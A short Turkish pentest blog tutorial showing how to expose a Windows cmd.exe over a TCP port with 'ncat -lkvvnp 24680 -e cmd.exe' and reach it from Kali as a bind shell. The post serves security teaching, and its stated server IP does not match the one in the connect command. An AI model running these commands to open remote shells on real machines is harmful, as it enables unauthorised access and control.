Ncat Aracı Kullanılarak Windows Sunucu Bilgisayarın Komut Satırına Doğrudan (Bind) Erişim Sağlanması

Yazarı:
Ertuğrul BAŞARANOĞLU
-
0
613
views
Ncat (netcat), komut satırından ağ üzerinde veri okuma / yazma işlemlerini gerçekleştirmeye yarayan bir araçtır. Bu aracın Linux ve Windows sürümleri bulunmaktadır. Bu yazıda, Windows bir bilgisayar sunucu olarak kullanılacak ve kendisine ağ üzerinden bağlantı kuran Linux istemci bilgisayarın Windows komut satırına doğrudan (bind connection) erişim elde edebildiği görülecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Kali bilgisayarlarda ncat aracı varsayılan olarak bulunmaktadır. Bunun yanında, Windows bilgisayar için ncat aracı Nmap sayfasından (http://nmap.org/ncat/) indirilebilir.

Windows bilgisayarın komut satırının belirli bir porttan (TCP\24680) hizmete açılması aşağıdaki gibidir.

whoami
ncat.exe -lkvvnp 24680 -e cmd.exe

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-01

Kali istemci bilgisayarından Windows sunucu bilgisayarının (192.168.234.129) açılan portu üzerinden komut satırına erişim aşağıdaki gibidir. Erişim sağlandıktan sonra, Windows sunucunun komut satırındaymış gibi komutlar çalıştırılabilir.

ncat 192.168.234.131 24680
whoami

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-02

Böylece, Windows sunucu bilgisayarında doğrudan (bind) bir bağlantının oluştuğu ve “cmd.exe” komutunun çalıştığı görülmektedir.

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-03

 

 

İlişkili Yazılar:
Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Benzer YazılarYAZARIN DİĞER İÇERİKLERİ

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

This site uses Akismet to reduce spam. Learn how your comment data is processed.